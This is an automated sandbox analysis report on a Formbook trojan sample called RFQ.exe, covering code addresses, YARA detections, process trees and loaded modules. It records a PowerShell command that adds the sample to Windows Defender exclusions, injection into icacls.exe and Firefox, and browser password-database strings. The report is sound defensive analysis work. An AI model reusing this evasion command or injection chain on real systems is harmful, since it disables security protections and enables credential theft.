            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B095C35_2_01B095C3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF75715_2_01AF7571
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFF43F5_2_01AFF43F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A314605_2_01A31460
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFF7B05_2_01AFF7B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF16CC5_2_01AF16CC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A856305_2_01A85630
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD59105_2_01AD5910
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A499505_2_01A49950
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5B9505_2_01A5B950
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A438E05_2_01A438E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAD8005_2_01AAD800
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5FB805_2_01A5FB80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB5BF05_2_01AB5BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7DBF95_2_01A7DBF9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFFB765_2_01AFFB76
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADDAAC5_2_01ADDAAC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A85AA05_2_01A85AA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE1AA35_2_01AE1AA3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEDAC65_2_01AEDAC6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB3A6C5_2_01AB3A6C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFFA495_2_01AFFA49
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF7A465_2_01AF7A46
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5FDC05_2_01A5FDC0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF7D735_2_01AF7D73
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A43D405_2_01A43D40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF1D5A5_2_01AF1D5A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFFCF25_2_01AFFCF2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB9C325_2_01AB9C32
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFFFB15_2_01AFFFB1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A41F925_2_01A41F92
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A03FD25_2_01A03FD2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A03FD55_2_01A03FD5
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFFF095_2_01AFFF09
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A49EB05_2_01A49EB0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039B03E68_2_039B03E6
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038FE3F08_2_038FE3F0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AA3528_2_039AA352
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039702C08_2_039702C0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039902748_2_03990274
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039B01AA8_2_039B01AA
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A41A28_2_039A41A2
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A81CC8_2_039A81CC
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0398A1188_2_0398A118
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038E01008_2_038E0100
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039781588_2_03978158
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039820008_2_03982000
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038EC7C08_2_038EC7C0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039147508_2_03914750
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F07708_2_038F0770
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0390C6E08_2_0390C6E0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039B05918_2_039B0591
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F05358_2_038F0535
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0399E4F68_2_0399E4F6
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039944208_2_03994420
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A24468_2_039A2446
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A6BD78_2_039A6BD7
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AAB408_2_039AAB40
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038EEA808_2_038EEA80
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F29A08_2_038F29A0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039BA9A68_2_039BA9A6
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039069628_2_03906962
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038D68B88_2_038D68B8
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0391E8F08_2_0391E8F0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F28408_2_038F2840
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038FA8408_2_038FA840
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0396EFA08_2_0396EFA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038E2FC88_2_038E2FC8
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038FCFE08_2_038FCFE0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03910F308_2_03910F30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03992F308_2_03992F30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03932F288_2_03932F28
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03964F408_2_03964F40
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03902E908_2_03902E90
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039ACE938_2_039ACE93
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AEEDB8_2_039AEEDB
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AEE268_2_039AEE26
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F0E598_2_038F0E59
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03908DBF8_2_03908DBF
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038EADE08_2_038EADE0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0398CD1F8_2_0398CD1F
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038FAD008_2_038FAD00
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03990CB58_2_03990CB5
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038E0CF28_2_038E0CF2
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F0C008_2_038F0C00
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0393739A8_2_0393739A
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A132D8_2_039A132D
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038DD34C8_2_038DD34C
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F52A08_2_038F52A0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0390B2C08_2_0390B2C0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039912ED8_2_039912ED
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038FB1B08_2_038FB1B0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039BB16B8_2_039BB16B
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0392516C8_2_0392516C
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038DF1728_2_038DF172
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F70C08_2_038F70C0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0399F0CC8_2_0399F0CC
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A70E98_2_039A70E9
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AF0E08_2_039AF0E0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AF7B08_2_039AF7B0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A16CC8_2_039A16CC
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039356308_2_03935630
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0398D5B08_2_0398D5B0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039B95C38_2_039B95C3
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A75718_2_039A7571
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AF43F8_2_039AF43F
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038E14608_2_038E1460
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0390FB808_2_0390FB80
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03965BF08_2_03965BF0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0392DBF98_2_0392DBF9
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AFB768_2_039AFB76
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03935AA08_2_03935AA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0398DAAC8_2_0398DAAC
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03991AA38_2_03991AA3
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0399DAC68_2_0399DAC6
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AFA498_2_039AFA49
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A7A468_2_039A7A46
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03963A6C8_2_03963A6C
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039859108_2_03985910
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0390B9508_2_0390B950
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F99508_2_038F9950
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F38E08_2_038F38E0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0395D8008_2_0395D800
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F1F928_2_038F1F92
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AFFB18_2_039AFFB1
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B3FD28_2_038B3FD2
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B3FD58_2_038B3FD5
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AFF098_2_039AFF09
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F9EB08_2_038F9EB0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_0390FDC08_2_0390FDC0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A1D5A8_2_039A1D5A
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038F3D408_2_038F3D40
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039A7D738_2_039A7D73
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039AFCF28_2_039AFCF2
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03969C328_2_03969C32
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D0CC08_2_030D0CC0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030CC1508_2_030CC150
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030CA1D08_2_030CA1D0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D27CB8_2_030D27CB
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D27D08_2_030D27D0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030C104C8_2_030C104C
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E97408_2_030E9740
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030CBF278_2_030CBF27
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030CBF308_2_030CBF30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: String function: 0396F290 appears 105 times
            Source: C:\Windows\SysWOW64\icacls.exeCode function: String function: 03925130 appears 58 times
            Source: C:\Windows\SysWOW64\icacls.exeCode function: String function: 038DB970 appears 280 times
            Source: C:\Windows\SysWOW64\icacls.exeCode function: String function: 03937E54 appears 111 times
            Source: C:\Windows\SysWOW64\icacls.exeCode function: String function: 0395EA12 appears 86 times
            Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 01A75130 appears 58 times
            Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 01A2B970 appears 280 times
            Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 01ABF290 appears 105 times
            Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 01A87E54 appears 111 times
            Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 01AAEA12 appears 86 times
            Source: RFQ.exe, 00000000.00000002.2018583562.00000000093A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2006725572.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2013468785.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2017154668.00000000073C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2009924751.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000000.1973725602.0000000000812000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeFri.exe: vs RFQ.exe
            Source: RFQ.exe, 00000005.00000002.2157658184.0000000001B2D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
            Source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiCACLS.EXEj% vs RFQ.exe
            Source: RFQ.exeBinary or memory string: OriginalFilenameeFri.exe: vs RFQ.exe
            Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFePlkmXblX4RY1BsP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFePlkmXblX4RY1BsP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@24/10
            Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Users\user\Desktop\RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\lslPeCbAktBspLhnUESkV
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyrwqexs.umm.ps1Jump to behavior
            Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: RFQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\RFQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: icacls.exe, 00000008.00000003.2333632738.0000000003316000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2333526865.00000000032F5000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003321000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003316000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ.exeVirustotal: Detection: 29%
            Source: RFQ.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\RFQ.exeFile read: C:\Users\user\Desktop\RFQ.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: srvcli.dllJump to behavior
